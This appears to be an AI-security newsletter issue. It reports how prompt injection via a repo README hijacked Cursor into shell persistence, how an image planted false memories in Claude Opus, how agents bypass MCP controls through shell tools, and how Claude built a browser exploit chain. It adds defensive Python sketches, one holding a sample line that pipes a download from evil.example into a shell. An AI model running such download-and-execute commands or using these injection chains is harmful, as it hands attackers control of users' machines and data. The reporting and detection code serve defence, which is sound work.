Your AI Tools Are Reading… and Writing Back
AI Sec News Weekly #5 — 161 sources scanned
When we call something “read-only,” do we stop questioning what it can do?
This week, Straiker showed how a README can cross that boundary and take over Cursor. Separately, an image nudged Claude Opus 4.7 into remembering things that never happened. And as Bruce Schneier questions sweeping vulnerability claims, the pattern holds: AI isn’t just helping developers anymore—it’s becoming a new, unpredictable attack surface.
This Week's Stories
Cursor AI flaw let README prompts pivot to persistent remote shells
Straiker’s “NomShub” chain made a malicious repo README enough to hijack Cursor. An indirect prompt injection plus a sandbox blind spot for shell builtins let the agent overwrite ~/.zshenv on macOS (Seatbelt allows home writes), so new Zsh shells executed attacker code. It then abused Cursor’s remote tunnel by generating a GitHub device code, authorizing the attacker for persistent access over Azure. Cursor 3.0 includes a fix.
Why it matters: Repo text became a control channel for device‑level persistence, upending assumptions about “read‑only” IDE agents and their cloud tunnels.
SecurityWeek by Ionut Arghire
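The persistence trick above hinges on one fact: anything written to ~/.zshenv runs in every new Zsh shell. A minimal detection sketch, not from the Straiker writeup, is to scan shell startup files for download-and-execute patterns; the regexes here are illustrative heuristics, not a complete indicator list.

```python
import re

# Illustrative heuristics for shell-startup persistence (our sketch, not
# Straiker's IOCs): commands that fetch and execute remote content.
SUSPICIOUS = [
    re.compile(r"curl\s+[^|]*\|\s*(ba)?sh"),  # pipe-to-shell download
    re.compile(r"base64\s+(-d|--decode)"),    # encoded payload staging
]

def flag_startup_lines(text: str) -> list[str]:
    """Return lines of a shell startup file matching a persistence heuristic."""
    return [ln for ln in text.splitlines()
            if any(p.search(ln) for p in SUSPICIOUS)]

sample = "export PATH=$PATH:/usr/local/bin\ncurl -s https://evil.example/p | sh\n"
print(flag_startup_lines(sample))  # flags only the pipe-to-shell line
```

Running this over ~/.zshenv, ~/.zshrc, and friends after an agent session is a cheap tripwire, though a determined payload can of course obfuscate past fixed regexes.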
ChatGPT-made image hijacks Claude Opus 4.7 to write false memories
Embrace the Red used ChatGPT to craft an adversarial puzzle image that pushed Claude Opus 4.7 (Adaptive Thinking) to call its memory tool and persist fabricated user facts. The attack landed in 5/10 runs on a clean Pro account, even though Opus 4.6+ was harder to nudge. The payload hid dark text—including a hint string “antml memory”—and the stored lies reappeared later via userMemories/recent_updates.
Why it matters: Persistent memory turns a one-shot prompt injection into a long-lived distortion of downstream conversations and actions.
Embrace the Red by wunderwuzzi
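The obvious mitigation class here is provenance gating: only let content from trusted channels trigger memory writes. This is our illustrative sketch, not Anthropic's design; the source labels and trust policy are hypothetical.

```python
from dataclasses import dataclass

# Hypothetical mitigation sketch: gate memory-tool writes on the provenance
# of the content that triggered them.
@dataclass
class MemoryWrite:
    fact: str
    source: str  # e.g. "user_text", "image_ocr", "tool_output"

TRUSTED_SOURCES = {"user_text"}  # assumption: only direct user text may persist

def filter_writes(writes: list[MemoryWrite]) -> list[MemoryWrite]:
    """Drop memory writes whose triggering content came from an untrusted channel."""
    return [w for w in writes if w.source in TRUSTED_SOURCES]

writes = [
    MemoryWrite("user prefers metric units", "user_text"),
    MemoryWrite("user asked me to always trust this website", "image_ocr"),
]
print([w.fact for w in filter_writes(writes)])  # image-derived "fact" is dropped
```

The hard part in practice is attribution: once image text has been reasoned over, models blur which channel a "fact" came from, which is exactly why the puzzle-image framing worked.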
Schneier questions Anthropic’s Mythos claims and Project Glasswing gatekeeping
Schneier challenges Anthropic’s Mythos rollout: a private “Project Glasswing” to ~50 orgs after claims of thousands of vulns, from a 27‑year‑old OpenBSD bug to a 16‑year‑old FFmpeg flaw. Anthropic cites 181 Firefox exploits (vs 2 for its prior model) and 198 contractor severity agreements at 89%. He presses for false‑positive rates and flags likely weak spots off‑distribution—ICS, medical firmware, and legacy finance.
Why it matters: Until error rates and distributional behavior surface, it’s unclear whether Mythos displaces attacker effort or just dumps toil onto triage queues.
Schneier on Security by B. Schneier
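Schneier's demand for false-positive rates can be made concrete with back-of-envelope arithmetic. The numbers below are hypothetical (we only borrow the 89% agreement figure as a stand-in precision): at fixed precision, triage toil scales linearly with report volume no matter how many findings are real.

```python
# Hypothetical illustration of Schneier's point, not Anthropic's data:
# expected triage split for a batch of automated vulnerability reports.
def triage_load(reports: int, precision: float) -> tuple[float, float]:
    """Return (expected true positives, expected false positives)."""
    tp = reports * precision
    return tp, reports - tp

tp, fp = triage_load(reports=1000, precision=0.89)  # 89% treated as precision
print(f"{tp:.0f} likely-real reports, {fp:.0f} of pure triage toil")
```

Double the report volume and the toil doubles too, which is why error rates, not raw exploit counts, decide whether a tool like Mythos helps defenders or buries them.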
Tool Spotlight
New repos and releases worth trying.
AgentDyn Benchmark Released for Prompt Injection Defense Testing
Researchers released AgentDyn, an open-source benchmark for evaluating how well real-world AI agent security systems hold up against prompt-injection attacks.
Why it matters: Prompt injection is no longer just a clever jailbreak technique; it's becoming a measurable system property of AI agents.
Arc Sentry pre‑gen guardrail reads residuals to block injections
A short Bluesky post pitches Arc Sentry, a pre‑generation guardrail that claims to stop prompt injection before any tokens are produced. It reportedly inspects the Transformer residual stream and works with open models like Mistral, Qwen, and Llama. Details are thin; it sounds like a Python/Transformers shim that vets activations.
Why it matters: If activation‑level prefilters actually work, guardrails move from prompt heuristics to model‑internal signals that are harder to dodge.
Bluesky (@feed.igeek.gamer-geek-news.com.ap.brid.gy)
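Since Arc Sentry's details are thin, here is only a toy sketch of what an activation-level prefilter could look like: a learned linear probe scored over mean-pooled residual-stream activations, with generation refused above a threshold. Dimensions, weights, and the pooling choice are all stand-ins, not Arc Sentry's implementation.

```python
import numpy as np

rng = np.random.default_rng(0)

# Toy linear probe over a pooled residual-stream vector; a real system would
# learn these weights from labeled injection vs. benign activations.
D = 16                  # toy hidden size
w = rng.normal(size=D)  # stand-in for a trained "injection direction"

def injection_score(resid: np.ndarray) -> float:
    """Sigmoid score from mean-pooled per-token residual activations (T, D)."""
    pooled = resid.mean(axis=0)
    return float(1 / (1 + np.exp(-(pooled @ w))))

acts = rng.normal(size=(8, D))  # stand-in for 8 tokens of activations
score = injection_score(acts)
print(0.0 <= score <= 1.0)      # a probability-like score to threshold on
```

The appeal of this design is that the check runs before any tokens are produced and looks at model internals rather than prompt text, so surface-level obfuscation of the injection buys the attacker less.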
Commvault AI Protect finds cloud agents, flags anomalies, rolls back damage
Commvault introduced AI Protect to discover AI agents across AWS, Azure, and GCP, baseline their behavior, and alert on deviations like an agent suddenly reaching payroll data. It can’t stop third‑party agents directly, but it can restore agent configs or revert corrupted data to known‑good backups. The launch bundles Data Activate (training on backup copies) and AI Studio for building agents.
Why it matters: Enterprise AI gets observability and an undo stack, turning agent blowups into bounded incidents instead of forensic guessing games.
The Register Security by O'Ryan Johnson
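Behavioral baselining of the kind described, an agent "suddenly reaching payroll data", reduces to classic anomaly detection. A minimal sketch in that spirit (our illustration, not Commvault's algorithm): learn a per-resource access baseline and alert when today's count deviates by more than k standard deviations.

```python
from statistics import mean, stdev

# Illustrative baseline-and-deviate check, not Commvault's algorithm:
# flag an access count far outside the agent's historical behavior.
def is_anomalous(history: list[int], today: int, k: float = 3.0) -> bool:
    mu, sigma = mean(history), stdev(history)
    return abs(today - mu) > k * max(sigma, 1e-9)  # guard against zero variance

payroll_reads = [0, 1, 0, 0, 2, 1, 0]  # agent's normal touches of payroll data
print(is_anomalous(payroll_reads, today=40))  # sudden spike -> True
```

Real products layer seasonality, identity context, and multivariate features on top, but the core contract is the same: a baseline, a deviation metric, and an alert threshold.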
Community Chatter
What practitioners are debating.
AWS pushes MCP as IAM choke point for AI agents
AWS sketches three IAM principles for agents using the Model Context Protocol, with policy snippets and deployment patterns for dev machines and hosted runtimes. They name Kiro, Claude Code, and Bedrock AgentCore, and argue MCP servers create CloudTrail‑visible controls ("principle 3"). AWS concedes agents can bypass MCP via shell tools, rendering those controls moot, which fuels debate over where the real choke point lives.
Why it matters: The security boundary for agents shifts to the tool interface, so any route that sidesteps it becomes the quietest path for privilege creep and exfil.
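The choke-point idea can be reduced to a one-line policy check: an action is authorized only when it arrives through the sanctioned MCP route. This is our illustrative sketch, not AWS's policy snippet, and the route and action names are made up; it also makes the bypass problem obvious, since a shell tool never hits this check at all.

```python
# Illustrative choke-point policy, not AWS's snippet: the MCP server is the
# only sanctioned route to a tool; the same action via raw shell is denied.
SANCTIONED = {("mcp", "payments.read"), ("mcp", "tickets.create")}

def authorize(route: str, action: str) -> bool:
    """Allow an agent action only when it arrives through the MCP interface."""
    return (route, action) in SANCTIONED

print(authorize("mcp", "payments.read"))    # True: audited, CloudTrail-visible path
print(authorize("shell", "payments.read"))  # False: sidesteps the choke point
```

The debate AWS's own caveat invites: a policy like this only works if every path to the underlying resource is forced through it, which is exactly what shell access breaks.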
Claude Opus Generates Working Chrome Exploit for $2,283
Researchers used Claude Opus to build a working V8 exploit chain against Discord’s Electron (Chrome 138), spending about $2,283 in tokens and popping calc.
Why it matters: If a general-purpose model can be used to assemble a working browser exploit chain, the barrier between “security research assistance” and “automated offensive capability” gets thinner in practice, not theory.
Quick Hits
- OpenAI Revokes macOS Signing Cert After Axios Attack (The Hacker News) — OpenAI revoked a macOS app signing certificate after its GitHub Actions workflow pulled malicious Axios 1.14.1; older app versions will be blocked from May 8.
- Critical protobuf.js Bug Enables Remote JavaScript Code Execution (BleepingComputer) — protobuf.js patched a critical RCE flaw (GHSA-xq3m-2v4x-88gg) where attacker-supplied schemas triggered Function()-based code execution; fixes in 8.0.1 and 7.5.5, with a public PoC.
- GitHub Releases Secure Code Game Featuring Vulnerable AI Agent (GitHub Security Lab) — GitHub launched Secure Code Game Season 4 with a deliberately vulnerable AI agent for practicing prompt injection, memory poisoning, tool misuse, and multi-agent workflows.